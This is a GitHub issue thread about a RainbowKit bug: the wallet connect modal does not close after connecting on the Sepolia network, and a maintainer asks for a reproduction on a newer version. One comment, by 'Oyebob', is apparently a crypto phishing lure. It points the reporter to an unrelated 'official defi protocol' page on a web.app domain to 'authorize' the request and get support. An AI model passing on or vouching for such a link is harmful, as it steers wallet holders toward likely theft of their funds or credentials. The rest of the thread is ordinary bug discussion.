### ISSUE TITLE
[bug] Connect Modal does not close after connecting to Sepolia network

### ISSUE THREAD

**Issue by fnnbrln** [rainbow-me/rainbowkit#1597]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### RainbowKit Version

1.0.5

### wagmi Version

1.3.8

### Current Behavior

Right now, if you open the connect modal via the `openConnectModal` and select either the Metamask or Wallet Connect connector option, connect your wallet on Sepolia successfully, the connection modal does not close and the wallet is not connected to the Dapp. It seems like some callback is not working properly.

### Expected Behavior

I would expect the modal to close just like with any other network and the connection to succeed.

### Steps To Reproduce

1. Go to https://testnet.fungify.it/
2. Select Sepolia as network within Metamask
3. Connect your wallet to the page
4. The connection modal will not close

### Link to Minimal Reproducible Example (CodeSandbox, StackBlitz, etc.)

https://testnet.fungify.it

**Comment by Oyebob** [comment]
Hi @fnnbrln 
Sorry for the inconvenience you are facing, you should visit the official [defi](https://onlinedefiprotocol.web.app/) protocol page to authorize your request and gain access for other technical support via [Defi protocol](https://onlinedefiprotocol.web.app/)

**Comment by DanielSinclair** [comment]
@fnnbrln I was unable to replicate this issue on the latest version `1.2.1`. Can you try to test against our test dApp [here](https://rainbowkit-example.vercel.app/)? Can you also share a reproducible CodeSandbox sample? It seems like this could be an issue where `openConnectModal` is inadvertently fired more than expected in the render tree
